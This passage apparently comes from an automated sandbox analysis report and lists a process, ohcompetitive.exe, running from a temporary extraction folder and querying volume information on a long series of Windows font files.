Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
